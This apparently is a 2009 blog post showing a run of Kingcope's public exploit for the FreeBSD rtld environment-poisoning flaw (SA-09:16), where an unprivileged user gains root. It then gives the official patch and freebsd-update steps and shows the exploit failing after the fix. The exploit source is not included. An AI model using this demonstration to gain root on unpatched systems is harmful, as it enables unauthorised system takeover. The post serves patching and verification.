2009.12.08

The exploit was published on exploit-db.com on 30/11/2009 and the Security Advisory came out on 03/12/2009, but it doesn't hurt to recall it. :)

*Vulnerability: Privilege escalation in rtld via environment poisoning. (FreeBSD Brasil)
*System: FreeBSD 7.1, 7.2, 8.0
*Security Advisory: FreeBSD-SA-09:16.rtld
*Exploit: FreeBSD Run-Time Link-Editor Local

Testing the exploit is extremely simple.
Logged in as an unprivileged user, download and run the exploit…

$ uname -a
FreeBSD fbsd8.speedgraph 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009 root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
$ id
uid=1001(b0t) gid=1001(b0t) groups=1001(b0t)
$ ./bsd.sh
bsd.sh FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function ‘main’:
env.c:5: warning: incompatible implicit declaration of built-in function ‘malloc’
env.c:9: warning: incompatible implicit declaration of built-in function ‘strcpy’
env.c:11: warning: incompatible implicit declaration of built-in function ‘execl’
cp: /tmp/w00t.so.1.0 and w00t.so.1.0 are identical (not copied).
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
#
# id
uid=1001(b0t) gid=1001(b0t) euid=0(root) groups=1001(b0t)

If you have not updated your system yet, just follow the procedure from the Security Advisory or use freebsd-update.

(root@fbsd8) /tmp# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld.patch
(root@fbsd8) /tmp# fetch http://security.FreeBSD.org/patches/SA-09:16/rtld.patch.asc
(root@fbsd8) /tmp# cd /usr/src/
(root@fbsd8) /usr/src# patch < /tmp/rtld.patch
(root@fbsd8) /usr/src# cd /usr/src/libexec/rtld-elf/
(root@fbsd8) /usr/src/libexec/rtld-elf# make obj && make depend && make && make install

or

(root@fbsd8) ~# freebsd-update fetch install

Then just test the exploit again…

$ uname -a
FreeBSD fbsd8.speedgraph 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009 root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
$ id
uid=1001(b0t) gid=1001(b0t) groups=1001(b0t)
$
$ ./bsd.sh
bsd.sh env env.c program.c program.o w00t.so.1.0 FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function ‘main’:
env.c:5: warning: incompatible implicit declaration of built-in function ‘malloc’
env.c:9: warning: incompatible implicit declaration of built-in function ‘strcpy’
env.c:11: warning: incompatible implicit declaration of built-in function ‘execl’
cp: /tmp/w00t.so.1.0 and w00t.so.1.0 are identical (not copied).
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; aborting
$
$ id
uid=1001(b0t) gid=1001(b0t) groups=1001(b0t)

Cheers!
